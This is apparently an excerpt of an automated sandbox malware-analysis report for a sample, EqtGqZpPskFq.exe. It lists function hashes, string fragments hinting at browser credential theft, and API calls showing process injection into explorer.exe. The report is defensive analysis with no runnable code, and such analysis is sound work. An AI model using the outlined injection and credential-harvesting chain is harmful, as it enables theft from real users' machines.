Instruction ID: 749a5282e551129968d6e180bcaaa90cb5c5c560ca26b283eb1db5facb14db77
Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction Fuzzy Hash: 1331E175508B486FD759DB28C4896EABBE4FBD4300F50491EE49BC3251EE30E54ACB42

Function 106D7FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

.dll, xrefs: 106D7FFE
chro, xrefs: 106D8023
hild, xrefs: 106D7FF6
me_c, xrefs: 106D7FEE

Memory Dump Source

Source File: 00000008.00000002.3851276803.0000000010610000.00000040.80000000.00040000.00000000.sdmp, Offset: 10610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10610000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction ID: 39fade4f2675906f14ebffa55abbcaad42673bcc2445fe3d390acbb1da63ffcc
Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction Fuzzy Hash: C1317E3411AB488FC7C4EF698495BAAB7E1FB98200F91462DA48ECB315DF30E905C756

Function 1055BFC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

hild, xrefs: 1055BFF6
chro, xrefs: 1055C023
.dll, xrefs: 1055BFFE
me_c, xrefs: 1055BFEE

Memory Dump Source

Source File: 00000008.00000002.3851132143.0000000010480000.00000040.00000001.00040000.00000000.sdmp, Offset: 10480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10480000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction ID: 529b8cfa90a64eb1c9e043ad66521a07375e7eb697b03d0cf4d15f7ced40a999
Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction Fuzzy Hash: 3F318374118B488FCB84EF688499BAA7BE1FFD8300F84462EA44EC7255DF30D945C752

Function 106D7FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

.dll, xrefs: 106D7FFE
chro, xrefs: 106D8023
hild, xrefs: 106D7FF6
me_c, xrefs: 106D7FEE

Memory Dump Source

Source File: 00000008.00000002.3851276803.0000000010610000.00000040.80000000.00040000.00000000.sdmp, Offset: 10610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10610000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction ID: 5605e93c20422e53275885bcca76434f6794e505dd419084e688b68491c14520
Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction Fuzzy Hash: C6319E3411AB488FC784DF688495BAAB7E1FF98300F91462DA48ECB355DF30D905C74A

Function 1055BFBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

hild, xrefs: 1055BFF6
chro, xrefs: 1055C023
.dll, xrefs: 1055BFFE
me_c, xrefs: 1055BFEE

Memory Dump Source

Source File: 00000008.00000002.3851132143.0000000010480000.00000040.00000001.00040000.00000000.sdmp, Offset: 10480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10480000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction ID: aafd5cdb275baf4238d48350a207394a17bc3fb7b20e865a87c186f92f83003b
Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction Fuzzy Hash: 78318074118B488FCB84DF688499BAABBE1FFD8300F95462EA44ACB255DF30D945CB52

Function 106DA8C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

nt: , xrefs: 106DA91E
User-Agent: , xrefs: 106DA935, 106DA948
on.d, xrefs: 106DA902
urlmon.dll, xrefs: 106DA959

Memory Dump Source

Source File: 00000008.00000002.3851276803.0000000010610000.00000040.80000000.00040000.00000000.sdmp, Offset: 10610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10610000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: d25c68608ddbee4bb16fb75bec014afd182ac7dd72210e08135e1614674def85
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 1F31DF31615B4C8BCB44EFA9C8857EEB7E0FF68205F40022AE45EDB240EE789645C789

Function 1055E8C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

User-Agent: , xrefs: 1055E935, 1055E948
on.d, xrefs: 1055E902
urlmon.dll, xrefs: 1055E959
nt: , xrefs: 1055E91E

Memory Dump Source

Source File: 00000008.00000002.3851132143.0000000010480000.00000040.00000001.00040000.00000000.sdmp, Offset: 10480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10480000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: 219fc21d28b4ca3292b2401fcbc0231abd004a6abe4b0f4a8291f6b2386fc635
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: CE31B131614A4D8BCB44EFA8C8897EDBBF1FB98214F40422AE45ED7240EE749645CB89

Function 106DA8BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

nt: , xrefs: 106DA91E
User-Agent: , xrefs: 106DA935, 106DA948
on.d, xrefs: 106DA902
urlmon.dll, xrefs: 106DA959

Memory Dump Source

Source File: 00000008.00000002.3851276803.0000000010610000.00000040.80000000.00040000.00000000.sdmp, Offset: 10610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10610000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: a4bb0c3255d19ab2ddb8b20fa5f7a4bdb94ee31e194a6e766942c487036671d4
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: DD21E670615B4C8BCB44EFA9C8957ED7BE0FF58205F40421AE45ADB340DF749645C789

Function 1055E8BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

User-Agent: , xrefs: 1055E935, 1055E948
on.d, xrefs: 1055E902
urlmon.dll, xrefs: 1055E959
nt: , xrefs: 1055E91E

Memory Dump Source

Source File: 00000008.00000002.3851132143.0000000010480000.00000040.00000001.00040000.00000000.sdmp, Offset: 10480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10480000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: fed1cac893fc36c7c4be64a50347558b4aa3885b3173ae51b9ea37ed72306a3d
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: 4621C330A14A4D8ACB45EFA8C8897ED7FB1FF98304F40421AE45AD7240EF7496458B89

Function 106DBE94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

., xrefs: 106DBF1F
l, xrefs: 106DBF03
t, xrefs: 106DBEF4
l, xrefs: 106DBF26

Memory Dump Source

Source File: 00000008.00000002.3851276803.0000000010610000.00000040.80000000.00040000.00000000.sdmp, Offset: 10610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10610000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction ID: ad2a7fd662a68bb6677f588c0712ae74bb6a1e0e134646e56ee18e2c83518f21
Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction Fuzzy Hash: DB218B74A25B0D9BDB48EFA8D4457EDBBF1FF58300F50462EE049D7600DB78A5918B88

Function 106DBE92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

., xrefs: 106DBF1F
l, xrefs: 106DBF03
t, xrefs: 106DBEF4
l, xrefs: 106DBF26

Memory Dump Source

Source File: 00000008.00000002.3851276803.0000000010610000.00000040.80000000.00040000.00000000.sdmp, Offset: 10610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10610000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction ID: 2309b0519bd97fe48cdcfe1a1fd686bd1c8e226b28fe25f0a9c7474c5ebbfb66
Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction Fuzzy Hash: 8C217C74A25B0D9BDB44EFA8D4457EDBBF1FF58300F50462EE049D7600DB74A5918B88

Function 1055FE94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

t, xrefs: 1055FEF4
l, xrefs: 1055FF03
., xrefs: 1055FF1F
l, xrefs: 1055FF26

Memory Dump Source

Source File: 00000008.00000002.3851132143.0000000010480000.00000040.00000001.00040000.00000000.sdmp, Offset: 10480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10480000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction ID: 238493c864a4adf62647287b70fc5416241885409e66a67c1f76257c11a5bae7
Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction Fuzzy Hash: 42219C74A24A0E9BDB48EFA8C0497EEBBF1FF58304F50462EE009E3600DB74A551CB84

Function 1055FE92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

t, xrefs: 1055FEF4
l, xrefs: 1055FF03
., xrefs: 1055FF1F
l, xrefs: 1055FF26

Memory Dump Source

Source File: 00000008.00000002.3851132143.0000000010480000.00000040.00000001.00040000.00000000.sdmp, Offset: 10480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10480000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction ID: bd2de402876f095d47766e55b88f65629de0ac86072e2cfd2d9c472b1a9a7dc5
Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction Fuzzy Hash: 95217C74A24A0E9BDB44EFA8C0497AEBBF1FB58304F50462EE009D3610DB74A551CB84

Function 106DBFF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

user, xrefs: 106DC015
logi, xrefs: 106DC03C
pass, xrefs: 106DC022
auth, xrefs: 106DC02F

Memory Dump Source

Source File: 00000008.00000002.3851276803.0000000010610000.00000040.80000000.00040000.00000000.sdmp, Offset: 10610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10610000_explorer.jbxd

Similarity

API ID:
String ID: auth$logi$pass$user
API String ID: 0-2393853802
Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction ID: 3848f89bd3bddefed93ffdc1e2a6858149e31cb19098f05b0e51738c87c6121b
Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction Fuzzy Hash: AB21CD70624B0D8BCB45CF9A98816EEB7E1EF88354F014619E44AEB344D7B1E9548BC6

Function 1055FFF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

user, xrefs: 10560015
logi, xrefs: 1056003C
auth, xrefs: 1056002F
pass, xrefs: 10560022

Memory Dump Source

Source File: 00000008.00000002.3851132143.0000000010480000.00000040.00000001.00040000.00000000.sdmp, Offset: 10480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10480000_explorer.jbxd

Similarity

API ID:
String ID: auth$logi$pass$user
API String ID: 0-2393853802
Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction ID: 127799b0c20bb82f2be25cf7babfb221670acf5b2d4bdf0a589e50bd3c224641
Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction Fuzzy Hash: 9721CD70614B0D8BCB45CF9998957DEBBF1EFC8354F005619E40AEB244D7B0E9548BC2

Analysis Process: EqtGqZpPskFq.exePID: 8076, Parent PID: 660COMMON

Execution Graph

Execution Coverage:	12.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	398
Total number of Limit Nodes:	15

Executed Functions

Function 071878FC Relevance: 1.7, APIs: 1, Instructions: 248
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07187B3E

Memory Dump Source

Source File: 0000000A.00000002.1515592722.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7180000_EqtGqZpPskFq.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 5908c3b91ef642022636650420b32d5611a24d4c683cc055907fea77064b153c
Instruction ID: 06ef94483248c2a0c0e0db0f56a6ca436f882315123778bbeac83d51f9023cf2
Opcode Fuzzy Hash: 5908c3b91ef642022636650420b32d5611a24d4c683cc055907fea77064b153c
Instruction Fuzzy Hash: 86A18FB1D0071ACFEB11DFA8C8407EDBBB2BF49710F148569D818A7290DB759A85CF91

Function 07187908 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07187B3E

Memory Dump Source

Source File: 0000000A.00000002.1515592722.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7180000_EqtGqZpPskFq.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e1b15bc44d59aea200ce939a5d98aabdbc697670700af7be27aee37f85197572
Instruction ID: 38a8e33e65799fbd185e396974d933842b2bc8451d9852c48105c1c514b548b3
Opcode Fuzzy Hash: e1b15bc44d59aea200ce939a5d98aabdbc697670700af7be27aee37f85197572
Instruction Fuzzy Hash: 9D917EB1D0071ACFEB51DFA8C840BEDBBB2BF49710F148569D818A7280DB749A81CF91

Function 012EADC8 Relevance: 1.7, APIs: 1, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 012EB01E

Memory Dump Source

Source File: 0000000A.00000002.1501945056.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_12e0000_EqtGqZpPskFq.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 19ff0da99890e85270d604ee97527318e142dc7d358d549b6cfe50d351d95fe6
Instruction ID: 01238d91e35e45571be8804f7d8aadce813b61319a7086d4e8d4bdc73f752548
Opcode Fuzzy Hash: 19ff0da99890e85270d604ee97527318e142dc7d358d549b6cfe50d351d95fe6
Instruction Fuzzy Hash: C8715870A10B068FEB24DF2AD44976ABBF1FF88304F448A2DD55ADBA40D775E845CB90

Function 05201898 Relevance: 1.6, APIs: 1, Instructions: 146
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.1506700039.0000000005200000.00000040.00000800.00020000.00000000.sdmp, Offset: 05200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5200000_EqtGqZpPskFq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6b543462ace0e6e95aeeacacd8b63a01d15ce38c82a48ae020cfa7ccbfc936b
Instruction ID: 35f32600e2c451ceb8be45d296fc6d4f8bcf141ab5736844a5f501f59cc6713e
Opcode Fuzzy Hash: a6b543462ace0e6e95aeeacacd8b63a01d15ce38c82a48ae020cfa7ccbfc936b
Instruction Fuzzy Hash: 9F51FDB5C11249EFDF11CFA9C984ADDBFB2BF48310F64816AE818AB261D7719990CF50

Function 052018F0 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05201A02

Memory Dump Source

Source File: 0000000A.00000002.1506700039.0000000005200000.00000040.00000800.00020000.00000000.sdmp, Offset: 05200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5200000_EqtGqZpPskFq.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: e8277d27b3c3362f5b93e1fb081a2213ed361123bce90a20a61239bf1ff6728f
Instruction ID: c411713f403fb1bcd86552e50edc2104de8a55fdab5a0ffeff403f410e45bd28
Opcode Fuzzy Hash: e8277d27b3c3362f5b93e1fb081a2213ed361123bce90a20a61239bf1ff6728f
Instruction Fuzzy Hash: 9541CEB1D10359DFDB14CF9AC884ADEBBB5BF88310F24812AE819AB251D7719945CF90

Function 012E449C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 012E59A9

Memory Dump Source

Source File: 0000000A.00000002.1501945056.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_12e0000_EqtGqZpPskFq.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 4990eb9001609e1c50ab9eb83a9b78b08d916f1d523b9b9bc275efad5085f908
Instruction ID: 4913baee1e2a5c40f68420d84ecf06a3045e5183f844bb462873a0db9c74a468
Opcode Fuzzy Hash: 4990eb9001609e1c50ab9eb83a9b78b08d916f1d523b9b9bc275efad5085f908
Instruction Fuzzy Hash: 8D41EEB4C10719CFDB24DFAAC884B8EBBF5BF89704F60806AD508AB251DB756945CF90

Function 012E58ED Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 012E59A9

Memory Dump Source

Source File: 0000000A.00000002.1501945056.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_12e0000_EqtGqZpPskFq.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e56e452cfd2a1f8bd200d5cff6f4e20645a2718012fe655428b66a02ef05871e
Instruction ID: fe1832815ff9788bf92b8b9e3cd7d7aa0521686654c5c7e79f4a4b3f3f349e0c
Opcode Fuzzy Hash: e56e452cfd2a1f8bd200d5cff6f4e20645a2718012fe655428b66a02ef05871e
Instruction Fuzzy Hash: 9A41EDB4C107198FDB24DFA9C884BCEBBF1AB89704F60806AD508AB251DB755945CF90

Function 05204050 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 05204111

Memory Dump Source

Source File: 0000000A.00000002.1506700039.0000000005200000.00000040.00000800.00020000.00000000.sdmp, Offset: 05200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5200000_EqtGqZpPskFq.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: e671033ac96a1f762da14dc1cb2834e42d716df625fefac34057d3f523779176
Instruction ID: 7094d4962cc15ef6679497ee6c00b9e426bd85e5afef6053f808c2775a08c64f
Opcode Fuzzy Hash: e671033ac96a1f762da14dc1cb2834e42d716df625fefac34057d3f523779176
Instruction Fuzzy Hash: 954115B8910309CFDB14DF89C848AAABBF6FF88314F25C459D519AB361D775A841CFA0

Function 07187278 Relevance: 1.6, APIs: 1, Instructions: 71
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07187310

Memory Dump Source

Source File: 0000000A.00000002.1515592722.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7180000_EqtGqZpPskFq.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 09ca1dccc3950768741729c45b40b7cbaf1320243924f5c9dc8bb720c334fcca
Instruction ID: c6ea44834541448a323c235b77e6b061f0414d60c59f343dadd67b8548d24609
Opcode Fuzzy Hash: 09ca1dccc3950768741729c45b40b7cbaf1320243924f5c9dc8bb720c334fcca
Instruction Fuzzy Hash: 35215AB19003099FDB10DFA9C880BDEBBF5FF48310F508429E918A7280C7799550CFA4

Function 07186B98 Relevance: 1.6, APIs: 1, Instructions: 70
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE ref: 07186C62

Memory Dump Source

Source File: 0000000A.00000002.1515592722.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7180000_EqtGqZpPskFq.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: c850313d6c871a78e09cede386b350867b734b5c77ec0d5cefa0e8e5debb7735
Instruction ID: b6b7afdd4e96f92d14925ea5c9f8a9b913497b229620e970d9e0bd03d2245ea6
Opcode Fuzzy Hash: c850313d6c871a78e09cede386b350867b734b5c77ec0d5cefa0e8e5debb7735
Instruction Fuzzy Hash: 932155B0E043499FDB10EFA9D4017AEBBF0AF88310F10846AD458A7280DB389A44CF91

Function 07187280 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07187310

Memory Dump Source

Source File: 0000000A.00000002.1515592722.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7180000_EqtGqZpPskFq.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: a44ed80407a2589529a46966b3a771e95b2debdfa67bbdb745510ffe4fe3905c
Instruction ID: 674944d19ab22c4b64a96d914ec19bdea7cac1df348534cd2adec838706d3cae
Opcode Fuzzy Hash: a44ed80407a2589529a46966b3a771e95b2debdfa67bbdb745510ffe4fe3905c
Instruction Fuzzy Hash: 592127B59003499FDB10DFAAC881BDEBBF5FF48310F508829E918A7280C7789944CFA4

Function 07186CA8 Relevance: 1.6, APIs: 1, Instructions: 68
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07186D2E

Memory Dump Source

Source File: 0000000A.00000002.1515592722.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7180000_EqtGqZpPskFq.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: cffc7682bb5c63963f8f7fc0e288f2185039cfacea087968ebcffc7a068b6b3d
Instruction ID: 1f3cd4aa9dea9cbb8efa5e7db08c289177efd1a37109bd163923c37d2d9cd49e
Opcode Fuzzy Hash: cffc7682bb5c63963f8f7fc0e288f2185039cfacea087968ebcffc7a068b6b3d
Instruction Fuzzy Hash: 06217CB59003099FDB10DFAAC4857EEBBF4EF88320F10842DD859A7241C7789945CFA4

Function 012EB7B0 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,012ED666,?,?,?,?,?), ref: 012ED727

Memory Dump Source

Source File: 0000000A.00000002.1501945056.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_12e0000_EqtGqZpPskFq.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 1b7951d51129da5d8ca5d33c2583ac151c8335061d1a756a49cb34b635204332
Instruction ID: add71304ceb5d1814ca2a56a93847002d343d5852bc1b2f32fce812e5580ac4d
Opcode Fuzzy Hash: 1b7951d51129da5d8ca5d33c2583ac151c8335061d1a756a49cb34b635204332
Instruction Fuzzy Hash: BB21E5B591024D9FDB10CF9AD984ADEBBF4EB48310F54841AE958A7350D374A950CFA4

Function 07186CB0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07186D2E

Memory Dump Source

Source File: 0000000A.00000002.1515592722.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7180000_EqtGqZpPskFq.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 4bcf7c920f69c61403e573e433b8253e9e551aafba728c602d3c7587a077e16b
Instruction ID: 33eb480572cf5063b26c80c85deb748391b1650d16a5813b0cdf7886bb04a1f1
Opcode Fuzzy Hash: 4bcf7c920f69c61403e573e433b8253e9e551aafba728c602d3c7587a077e16b
Instruction Fuzzy Hash: BE2149B19003098FDB10DFAAC4857EEBBF4EF88320F548429D459A7281CB789945CFA4

Function 07187370 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 071873F0

Memory Dump Source

Source File: 0000000A.00000002.1515592722.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7180000_EqtGqZpPskFq.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 769add47122734cf8e5b2e01e71ed13050e6f981184d0503b6037beeae93cca7
Instruction ID: ae3ca626f6c0b81e197edce28d3a06d2717fbe97560d71cb0f6b59503a0dea02
Opcode Fuzzy Hash: 769add47122734cf8e5b2e01e71ed13050e6f981184d0503b6037beeae93cca7
Instruction Fuzzy Hash: BA2116B18003599FDB10DFAAC880BEEBBF5FF48310F508429E959A7240C7799540CFA5

Function 0718736A Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 071873F0

Memory Dump Source

Source File: 0000000A.00000002.1515592722.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7180000_EqtGqZpPskFq.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: ae55a9e0fd74bf8db606de8c2c49e077a3586ac12b9259dc46e51e4c1a848bec
Instruction ID: 49304b912434ce890440a9e458dae2af724a30e8104bc5f4dc5c8886f64a99ad
Opcode Fuzzy Hash: ae55a9e0fd74bf8db606de8c2c49e077a3586ac12b9259dc46e51e4c1a848bec
Instruction Fuzzy Hash: B72148B58003598FDB10DFA9D880BEEBBF5FF48310F60882AE919A7290C7389544CF64

Function 012ED698 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

